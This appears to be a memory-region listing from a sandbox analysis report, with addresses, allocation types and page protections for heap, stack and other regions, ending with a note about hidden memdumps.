28C48750000
heap
page read and write
D7BF000
stack
page read and write
EA8000
heap
page read and write
968A000
unkown
page readonly
2776000
heap
page read and write
3340000
heap
page read and write
2A60000
heap
page read and write
28C48D08000
heap
page read and write
2CFC000
stack
page read and write
A1BD000
direct allocation
page read and write
D7CB000
heap
page read and write
2B2B000
direct allocation
page read and write
220D37E1000
heap
page read and write
2778000
heap
page read and write
28C48182000
heap
page read and write
28C48D01000
heap
page read and write
1C44D40D000
heap
page read and write
28C4A97C000
heap
page read and write
31AF000
unkown
page read and write
7FB5000
unkown
page execute read
1C44D3A8000
heap
page read and write
28C4A9D7000
heap
page read and write
2C61000
heap
page read and write
28C4A340000
heap
page read and write
FFD60000
direct allocation
page read and write
28C493B2000
heap
page read and write
D86E000
heap
page read and write
9594000
unkown
page readonly
12320000
heap
page read and write
D6BD000
stack
page read and write
2B56000
direct allocation
page read and write
28C4A9B3000
heap
page read and write
962A000
unkown
page readonly
2C61000
heap
page read and write
28C4A8EC000
heap
page read and write
95B3000
unkown
page readonly
28C4A2BC000
heap
page read and write
28C4240D000
heap
page read and write
2C61000
heap
page read and write
2C61000
heap
page read and write
925B000
unkown
page read and write
2C61000
heap
page read and write
28C4A172000
heap
page read and write
28C4A592000
heap
page read and write
2A6D000
direct allocation
page read and write
3350000
heap
page read and write
2C61000
heap
page read and write
28C48D15000
heap
page read and write
28C48D07000
heap
page read and write
28C489A2000
heap
page read and write
122FC000
heap
page read and write
28C4A2BC000
heap
page read and write
3390000
heap
page read and write
1C44D3F4000
heap
page read and write
23979A07000
heap
page read and write
9288000
unkown
page write copy
28C48D07000
heap
page read and write
2AD9000
direct allocation
page read and write
27E0000
heap
page read and write
30FD000
stack
page read and write
9601000
unkown
page readonly
28C48CBA000
heap
page read and write
28C4A8EC000
heap
page read and write
A1DC000
direct allocation
page read and write
2A30000
heap
page read and write
29AA000
heap
page read and write
9504000
unkown
page readonly
954D000
unkown
page readonly
28C48E8A000
heap
page read and write
95CA000
unkown
page readonly
1C44D4B0000
remote allocation
page read and write
B09E000
stack
page read and write
2B48000
direct allocation
page read and write
2A86000
direct allocation
page read and write
D801000
heap
page read and write
B5D2000
direct allocation
page read and write
AF10000
remote allocation
page read and write
28C48CDC000
heap
page read and write
270B000
heap
page read and write
28C480CC000
heap
page read and write
2C61000
heap
page read and write
28C49AA8000
heap
page read and write
3367000
heap
page read and write
B1DE000
stack
page read and write
28C48F0E000
heap
page read and write
28C49AEA000
heap
page read and write
28C42408000
heap
page read and write
2C61000
heap
page read and write
A1EA000
direct allocation
page read and write
2FE9000
heap
page read and write
2C61000
heap
page read and write
CCC0000
trusted library allocation
page read and write
2FE6000
heap
page read and write
94F8000
unkown
page readonly
220D3A95000
heap
page read and write
220D383C000
heap
page read and write
220D37E2000
heap
page read and write
28C4A71E000
heap
page read and write
28C4A868000
heap
page read and write
954A000
unkown
page readonly
28C49268000
heap
page read and write
28C4246E000
heap
page read and write
28C4A3C4000
heap
page read and write
28C4242D000
heap
page read and write
9621000
unkown
page readonly
2C61000
heap
page read and write
28C486CC000
heap
page read and write
2C61000
heap
page read and write
28C4A130000
heap
page read and write
1C44D3CA000
heap
page read and write
28C48D01000
heap
page read and write
D861000
heap
page read and write
E67000
heap
page read and write
D65C000
direct allocation
page read and write
3630000
heap
page read and write
28C4A97C000
heap
page read and write
28C48CF4000
heap
page read and write
28C4830E000
heap
page read and write
D81E000
heap
page read and write
2C53000
heap
page read and write
2C61000
heap
page read and write
29AA000
heap
page read and write
28C48607000
heap
page read and write
95CE000
unkown
page readonly
239799FC000
heap
page read and write
2C6F000
stack
page read and write
9164000
unkown
page read and write
2C61000
heap
page read and write
400000
unkown
page readonly
28C49F20000
heap
page read and write
2C61000
heap
page read and write
2C61000
heap
page read and write
2A60000
direct allocation
page read and write
B5D9000
direct allocation
page read and write
28C48D10000
heap
page read and write
28C48CF9000
heap
page read and write
28C48B70000
heap
page read and write
2C61000
heap
page read and write
2FED000
stack
page read and write
2C61000
heap
page read and write
28C4909A000
heap
page read and write
9597000
unkown
page readonly
23979D90000
heap
page read and write
2897000
heap
page read and write
9526000
unkown
page readonly
2C61000
heap
page read and write
32C6000
heap
page read and write
220D3797000
heap
page read and write
9509000
unkown
page readonly
961D000
unkown
page readonly
2BB0000
heap
page read and write
2897000
heap
page read and write
28C48CF8000
heap
page read and write
319F000
stack
page read and write
28C495C2000
heap
page read and write
D7CE000
heap
page read and write
A60F000
direct allocation
page read and write
26FF000
unkown
page read and write
28C4A4CC000
heap
page read and write
95B6000
unkown
page readonly
301E000
stack
page read and write
28C49688000
heap
page read and write
28FA000
heap
page read and write
2C7B000
heap
page read and write
28C49B2C000
heap
page read and write
2BA0000
heap
page read and write
2800000
heap
page read and write
28C4A617000
heap
page read and write
2B90000
heap
page read and write
28C499E2000
heap
page read and write
2C61000
heap
page read and write
28C48CD5000
heap
page read and write
2779000
heap
page read and write
28C492AA000
heap
page read and write
EBA000
heap
page read and write
300B000
heap
page read and write
952B000
unkown
page readonly
6932000
unkown
page execute read
405000
unkown
page execute read
ABC000
unkown
page read and write
32C6000
heap
page read and write
2A06000
heap
page read and write
2C61000
heap
page read and write
7F5A000
unkown
page execute read
965C000
unkown
page readonly
28C4A9D3000
heap
page read and write
AF10000
remote allocation
page read and write
D65E000
direct allocation
page read and write
D5BD000
trusted library allocation
page read and write
28C48D07000
heap
page read and write
28C49604000
heap
page read and write
7908000
unkown
page execute read
2779000
heap
page read and write
A26D000
direct allocation
page read and write
28C4889A000
heap
page read and write
D5C4000
direct allocation
page read and write
32C6000
heap
page read and write
9501000
unkown
page readonly
1C44D3AB000
heap
page read and write
A185000
unkown
page readonly
220D37C0000
heap
page read and write
28E6000
heap
page read and write
28C4995E000
heap
page read and write
B3DE000
stack
page read and write
2C61000
heap
page read and write
275F000
heap
page read and write
95DE000
unkown
page readonly
28C48CD2000
heap
page read and write
2C4E000
unkown
page read and write
2C61000
heap
page read and write
28C48BF4000
heap
page read and write
B49C000
direct allocation
page read and write
28C423EB000
heap
page read and write
28C48B2E000
heap
page read and write
335E000
stack
page read and write
28C48392000
heap
page read and write
9632000
unkown
page readonly
2FE9000
heap
page read and write
28C48240000
heap
page read and write
A420000
direct allocation
page read and write
220D37E4000
heap
page read and write
2C61000
heap
page read and write
28C494FC000
heap
page read and write
28C4A6DC000
heap
page read and write
2C61000
heap
page read and write
2C61000
heap
page read and write
2C61000
heap
page read and write
28C497D2000
heap
page read and write
2C61000
heap
page read and write
28C48CF4000
heap
page read and write
29E0000
heap
page read and write
28C48D0B000
heap
page read and write
2E00000
heap
page read and write
2C61000
heap
page read and write
B655000
direct allocation
page read and write
6817000
unkown
page execute read
D7D2000
heap
page read and write
28C494BA000
heap
page read and write
B29000
unkown
page read and write
2AD0000
heap
page read and write
28C48CFE000
heap
page read and write
220D3840000
heap
page read and write
6B31000
unkown
page execute read
D65E000
direct allocation
page read and write
965A000
unkown
page readonly
9666000
unkown
page readonly
239799E8000
heap
page read and write
28C4A1B4000
heap
page read and write
7B07000
unkown
page execute read
28C4A71F000
heap
page read and write
2C61000
heap
page read and write
9545000
unkown
page readonly
28C49D11000
heap
page read and write
28C48C36000
heap
page read and write
2C61000
heap
page read and write
EFE000
heap
page read and write
28C423FD000
heap
page read and write
28C494BA000
heap
page read and write
28C4A130000
heap
page read and write
28C48648000
heap
page read and write
2C61000
heap
page read and write
33A6000
heap
page read and write
28C49D94000
heap
page read and write
B31000
unkown
page readonly
220D3790000
heap
page read and write
35FE000
stack
page read and write
28C49C76000
heap
page read and write
D804000
heap
page read and write
3F76CFF000
stack
page read and write
2B24000
direct allocation
page read and write
35E0000
heap
page read and write
28C48D0E000
heap
page read and write
9270000
unkown
page read and write
28C48D18000
heap
page read and write
2A50000
heap
page read and write
E3A000
heap
page read and write
A59C000
direct allocation
page read and write
E93000
heap
page read and write
28C4242C000
heap
page read and write
5493000
unkown
page execute read
913A000
unkown
page execute read
400000
unkown
page readonly
28C4A9E3000
heap
page read and write
1317C000
stack
page read and write
2C61000
heap
page read and write
2A5B000
heap
page read and write
28C4A550000
heap
page read and write
2C61000
heap
page read and write
133BF000
stack
page read and write
220D38A0000
heap
page read and write
237D000
stack
page read and write
F0A000
heap
page read and write
916B000
unkown
page write copy
220D5800000
heap
page read and write
132BE000
stack
page read and write
28C0000
heap
page read and write
2AD2000
direct allocation
page read and write
2C61000
heap
page read and write
28C48AAA000
heap
page read and write
9606000
unkown
page readonly
922A000
unkown
page read and write
28C48CEC000
heap
page read and write
28C489E4000
heap
page read and write
28C49646000
heap
page read and write
3F76EFF000
stack
page read and write
5420000
direct allocation
page execute and read and write
AF10000
trusted library allocation
page read and write
2C61000
heap
page read and write
501F3FE000
stack
page read and write
342F000
stack
page read and write
AF10000
trusted library allocation
page read and write
274E000
stack
page read and write
1C44D3DC000
heap
page read and write
6FCF9000
unkown
page read and write
28C49226000
heap
page read and write
28C49C77000
heap
page read and write
28C4A028000
heap
page read and write
501F4FE000
stack
page read and write
A417000
direct allocation
page read and write
220D3847000
heap
page read and write
29A7000
heap
page read and write
304F000
stack
page read and write
2FE6000
heap
page read and write
9286000
unkown
page read and write
28C48CFE000
heap
page read and write
28C4891E000
heap
page read and write
18C000
stack
page read and write
28C48BB2000
heap
page read and write
501F1FF000
stack
page read and write
2EFD000
stack
page read and write
28C48D08000
heap
page read and write
95C3000
unkown
page readonly
2C61000
heap
page read and write
2C61000
heap
page read and write
2A40000
direct allocation
page execute and read and write
B6D0000
direct allocation
page read and write
5470000
heap
page read and write
38A0000
heap
page read and write
2C61000
heap
page read and write
2AB5000
direct allocation
page read and write
915E000
unkown
page read and write
28C423F1000
heap
page read and write
9576000
unkown
page readonly
28C4A06B000
heap
page read and write
28C42D51000
heap
page read and write
34BE000
unkown
page read and write
2C61000
heap
page read and write
28C48D08000
heap
page read and write
61E6000
unkown
page execute read
28C4246E000
heap
page read and write
28C48AEC000
heap
page read and write
95D7000
unkown
page readonly
F21000
heap
page read and write
A5B9000
direct allocation
page read and write
36EE000
stack
page read and write
2720000
heap
page read and write
28C48BB2000
heap
page read and write
2C3F000
stack
page read and write
28C462F3000
heap
page read and write
23979D50000
heap
page read and write
23979A1E000
heap
page read and write
AB6000
unkown
page read and write
DC4000
heap
page read and write
2C61000
heap
page read and write
337B000
heap
page read and write
28C49AA8000
heap
page read and write
2E8E000
stack
page read and write
2C61000
heap
page read and write
23F0000
heap
page read and write
28C4828A000
heap
page read and write
2FB0000
heap
page read and write
28C423EE000
heap
page read and write
32FC000
stack
page read and write
28C4A92F000
heap
page read and write
33A0000
heap
page read and write
28C49058000
heap
page read and write
233D000
stack
page read and write
220D37CD000
heap
page read and write
A221000
direct allocation
page read and write
2C61000
heap
page read and write
23EE000
unkown
page read and write
A617000
direct allocation
page read and write
912F000
unkown
page execute read
28C4A7A3000
heap
page read and write
B5C4000
direct allocation
page read and write
29EF000
stack
page read and write
32AF000
heap
page read and write
26FD000
stack
page read and write
D853000
heap
page read and write
2C61000
heap
page read and write
28C423A8000
heap
page read and write
9188000
unkown
page read and write
28C4A448000
heap
page read and write
414000
unkown
page execute read
1C44D3CA000
heap
page read and write
1C44D3AD000
heap
page read and write
1C44D398000
heap
page read and write
28C48CFE000
heap
page read and write
28C48E48000
heap
page read and write
23979A31000
heap
page read and write
28C49A24000
heap
page read and write
32C6000
heap
page read and write
2C61000
heap
page read and write
28C48F92000
heap
page read and write
28C48CE6000
heap
page read and write
28C48D01000
heap
page read and write
28C48D01000
heap
page read and write
28C4A173000
heap
page read and write
220D37FC000
heap
page read and write
73CC000
unkown
page execute read
28C4A8EC000
heap
page read and write
2B65000
direct allocation
page read and write
28C48D13000
heap
page read and write
2C61000
heap
page read and write
28C48F50000
heap
page read and write
D9E000
stack
page read and write
E67000
heap
page read and write
DC4000
heap
page read and write
2C61000
heap
page read and write
28C4A658000
heap
page read and write
28C49791000
heap
page read and write
27B0000
heap
page read and write
2A30000
heap
page read and write
2750000
heap
page read and write
2ABD000
direct allocation
page read and write
31D0000
heap
page read and write
28C48CF4000
heap
page read and write
A1F9000
direct allocation
page read and write
B4A3000
direct allocation
page read and write
2767000
heap
page read and write
D65E000
direct allocation
page read and write
23979A2A000
heap
page read and write
927B000
unkown
page read and write
28C4A550000
heap
page read and write
A213000
direct allocation
page read and write
2C61000
heap
page read and write
220D37C7000
heap
page read and write
2C9F000
stack
page read and write
960D000
unkown
page readonly
F2A000
heap
page read and write
2B32000
direct allocation
page read and write
A640000
direct allocation
page read and write
94E7000
unkown
page readonly
3397000
heap
page read and write
2C61000
heap
page read and write
28C49FE6000
heap
page read and write
28C48D15000
heap
page read and write
2A77000
direct allocation
page read and write
D7C0000
heap
page read and write
28C48D0E000
heap
page read and write
2970000
heap
page read and write
3370000
heap
page read and write
41C000
unkown
page execute read
7D59000
unkown
page execute read
D7DA000
heap
page read and write
2C61000
heap
page read and write
1C44D370000
heap
page read and write
956D000
unkown
page readonly
28C48D82000
heap
page read and write
2C61000
heap
page read and write
2C61000
heap
page read and write
28C48D04000
heap
page read and write
23979A31000
heap
page read and write
94DD000
unkown
page readonly
2C61000
heap
page read and write
28C423FD000
heap
page read and write
951F000
unkown
page readonly
2A10000
heap
page read and write
28C4953E000
heap
page read and write
28C48792000
heap
page read and write
D838000
heap
page read and write
9642000
unkown
page readonly
2C61000
heap
page read and write
2B30000
heap
page read and write
28C4A5D4000
heap
page read and write
23979A35000
heap
page read and write
9615000
unkown
page readonly
28C49E18000
heap
page read and write
28C4911E000
heap
page read and write
2A80000
heap
page read and write
28C48D08000
heap
page read and write
95E6000
unkown
page readonly
28C48CDC000
heap
page read and write
28C49EDE000
heap
page read and write
2C72000
heap
page read and write
28C49F20000
heap
page read and write
B95A3FE000
stack
page read and write
28C49FA4000
heap
page read and write
B5EF000
direct allocation
page read and write
2C80000
heap
page read and write
3255000
heap
page read and write
D877000
heap
page read and write
AD000
stack
page read and write
28C49370000
heap
page read and write
2766000
heap
page read and write
28C49F20000
heap
page read and write
28C423C4000
heap
page read and write
28C49B2C000
heap
page read and write
D8C4000
heap
page read and write
2756000
heap
page read and write
28C49E18000
heap
page read and write
959B000
unkown
page readonly
AF8000
unkown
page read and write
2FBB000
heap
page read and write
28C4A27B000
heap
page read and write
28C49A66000
heap
page read and write
28C4A868000
heap
page read and write
1C44D40D000
heap
page read and write
28C4A7A2000
heap
page read and write
2C61000
heap
page read and write
220D37DF000
heap
page read and write
31F0000
heap
page read and write
220D3834000
heap
page read and write
9281000
unkown
page read and write
2C61000
heap
page read and write
3310000
heap
page read and write
2C61000
heap
page read and write
263D000
stack
page read and write
28C49A24000
heap
page read and write
28C48CDC000
heap
page read and write
28C48CEE000
heap
page read and write
D65E000
direct allocation
page read and write
23E0000
heap
page read and write
AF36000
trusted library allocation
page read and write
28C4909A000
heap
page read and write
422000
unkown
page execute read
B69E000
direct allocation
page read and write
28C4A5D4000
heap
page read and write
2FD6000
heap
page read and write
28C48F0E000
heap
page read and write
2778000
heap
page read and write
28C48248000
heap
page read and write
28C48D08000
heap
page read and write
28C4A826000
heap
page read and write
A215000
direct allocation
page read and write
190000
heap
page read and write
29EB000
heap
page read and write
28C48CE0000
heap
page read and write
28C458F3000
heap
page read and write
9266000
unkown
page read and write
28C48CFF000
heap
page read and write
1C44D3AD000
heap
page read and write
964E000
unkown
page readonly
12D000
stack
page read and write
B5F6000
direct allocation
page read and write
28C49B6E000
heap
page read and write
31F0000
heap
page read and write
2C61000
heap
page read and write
D88B000
heap
page read and write
28C49D52000
heap
page read and write
3850000
heap
page read and write
28C4A8AB000
heap
page read and write
D8C2000
heap
page read and write
953B000
unkown
page readonly
267E000
stack
page read and write
28C48CED000
heap
page read and write
9566000
unkown
page readonly
2C61000
heap
page read and write
5480000
unkown
page readonly
28C48D41000
heap
page read and write
28C4A6DC000
heap
page read and write
28C423CA000
heap
page read and write
28C4246E000
heap
page read and write
951C000
unkown
page readonly
28C4A06A000
heap
page read and write
9573000
unkown
page readonly
28C46CF3000
heap
page read and write
B959F2C000
stack
page read and write
2C61000
heap
page read and write
6FCD1000
unkown
page execute read
28C49C34000
heap
page read and write
2E7D000
stack
page read and write
AD2000
unkown
page read and write
220D3980000
heap
page read and write
2B73000
direct allocation
page read and write
28C48350000
heap
page read and write
28C497D2000
heap
page read and write
27A0000
heap
page read and write
28C4A27A000
heap
page read and write
E8E000
heap
page read and write
1327C000
stack
page read and write
333B000
heap
page read and write
28C48D08000
heap
page read and write
2C61000
heap
page read and write
A538000
direct allocation
page read and write
28C48D01000
heap
page read and write
2B00000
heap
page read and write
9184000
unkown
page read and write
FFCF0000
direct allocation
page read and write
23979960000
heap
page read and write
23979A08000
heap
page read and write
28C48CBA000
heap
page read and write
2C61000
heap
page read and write
28C4A978000
heap
page read and write
3020000
heap
page read and write
2C61000
heap
page read and write
289A000
heap
page read and write
2AF8000
direct allocation
page read and write
28FA000
heap
page read and write
122D0000
heap
page read and write
28C485C4000
heap
page read and write
28C4932E000
heap
page read and write
2DFE000
unkown
page read and write
220D3A90000
heap
page read and write
2C61000
heap
page read and write
220D7210000
trusted library allocation
page read and write
A204000
direct allocation
page read and write
9293000
unkown
page write copy
23979A1A000
heap
page read and write
28C48541000
heap
page read and write
9199000
unkown
page read and write
9294000
unkown
page readonly
274B000
heap
page read and write
2C61000
heap
page read and write
2C61000
heap
page read and write
1C44D3DC000
heap
page read and write
28C49790000
heap
page read and write
91AE000
unkown
page write copy
E96000
heap
page read and write
263E000
unkown
page read and write
501EEFE000
stack
page read and write
924A000
unkown
page read and write
2886000
heap
page read and write
28C423C7000
heap
page read and write
28C48048000
heap
page read and write
501F6FB000
stack
page read and write
28C4A340000
heap
page read and write
28C49856000
heap
page read and write
28C48C78000
heap
page read and write
28C4A760000
heap
page read and write
13500000
trusted library allocation
page read and write
D8BA000
heap
page read and write
603A000
unkown
page execute read
9579000
unkown
page readonly
D5C0000
direct allocation
page read and write
238E000
unkown
page read and write
2FD0000
heap
page read and write
D7E9000
heap
page read and write
239799F1000
heap
page read and write
2C61000
heap
page read and write
28C49436000
heap
page read and write
2776000
heap
page read and write
2FD0000
heap
page read and write
3250000
heap
page read and write
2C61000
heap
page read and write
28C491A2000
heap
page read and write
23DE000
unkown
page read and write
28C48D07000
heap
page read and write
D85A000
heap
page read and write
28C4889B000
heap
page read and write
28C48960000
heap
page read and write
EAA000
heap
page read and write
232D000
stack
page read and write
3380000
heap
page read and write
29DE000
stack
page read and write
28C484DC000
heap
page read and write
28C4A2FE000
heap
page read and write
28C4A593000
heap
page read and write
B640000
direct allocation
page read and write
28C42400000
heap
page read and write
28C4974E000
heap
page read and write
9656000
unkown
page readonly
28C42B51000
heap
page read and write
28C4A616000
heap
page read and write
28C48E8A000
heap
page read and write
1C44D3DB000
heap
page read and write
28F7000
heap
page read and write
B652000
direct allocation
page read and write
28C496CA000
heap
page read and write
2C61000
heap
page read and write
28C48006000
heap
page read and write
220D37CB000
heap
page read and write
2C61000
heap
page read and write
9542000
unkown
page readonly
B6D8000
direct allocation
page read and write
501EDFE000
stack
page read and write
5492000
unkown
page execute and read and write
28CB000
heap
page read and write
E96000
heap
page read and write
2778000
heap
page read and write
348F000
stack
page read and write
2B14000
direct allocation
page read and write
28C48491000
heap
page read and write
2C61000
heap
page read and write
2FEA000
heap
page read and write
28C423FD000
heap
page read and write
A570000
direct allocation
page read and write
6FCD0000
unkown
page readonly
617D000
unkown
page execute read
2880000
heap
page read and write
220D3837000
heap
page read and write
2DA0000
heap
page read and write
2C61000
heap
page read and write
320E000
unkown
page read and write
28C48CEC000
heap
page read and write
7E3F000
unkown
page execute read
28C48CF9000
heap
page read and write
28C4A3C4000
heap
page read and write
2C61000
heap
page read and write
336A000
heap
page read and write
28C4A238000
heap
page read and write
32C9000
heap
page read and write
28C49BF2000
heap
page read and write
965F000
unkown
page readonly
28C4970C000
heap
page read and write
2C61000
heap
page read and write
28C423EE000
heap
page read and write
2C50000
heap
page read and write
D7DE000
heap
page read and write
2B8F000
stack
page read and write
4AC000
unkown
page execute read
2FEA000
heap
page read and write
28C48CF4000
heap
page read and write
B19E000
stack
page read and write
28C49A67000
heap
page read and write
AF31000
trusted library allocation
page read and write
28C48CE9000
heap
page read and write
2ABF000
unkown
page read and write
28C4A978000
heap
page read and write
B6BB000
direct allocation
page read and write
1C44D3B0000
heap
page read and write
28C49160000
heap
page read and write
28C4A8AA000
heap
page read and write
28F7000
heap
page read and write
28C423EB000
heap
page read and write
2C61000
heap
page read and write
915C000
unkown
page read and write
6AD7000
unkown
page execute read
54AC000
unkown
page execute read
28EF000
unkown
page read and write
28C49BB0000
heap
page read and write
28C4A382000
heap
page read and write
2FE6000
heap
page read and write
2840000
heap
page read and write
9135000
unkown
page execute read
2AD0000
heap
page read and write
2C61000
heap
page read and write
2C61000
heap
page read and write
2AFE000
stack
page read and write
273E000
stack
page read and write
2B36000
heap
page read and write
36AF000
unkown
page read and write
2C61000
heap
page read and write
2C61000
heap
page read and write
28C49DD6000
heap
page read and write
37EF000
stack
page read and write
CB3A000
trusted library allocation
page read and write
283F000
unkown
page read and write
28C47FC4000
heap
page read and write
356F000
stack
page read and write
2A06000
heap
page read and write
28C43151000
heap
page read and write
2BDF000
stack
page read and write
A607000
direct allocation
page read and write
28C4868A000
heap
page read and write
2ACB000
direct allocation
page read and write
2779000
heap
page read and write
220D39A0000
heap
page read and write
329B000
heap
page read and write
2C61000
heap
page read and write
10FF000
stack
page read and write
2C61000
heap
page read and write
DABF000
stack
page read and write
28C423FD000
heap
page read and write
289A000
heap
page read and write
1313C000
stack
page read and write
28C48648000
heap
page read and write
There are 1389 hidden memdumps, click here to show them.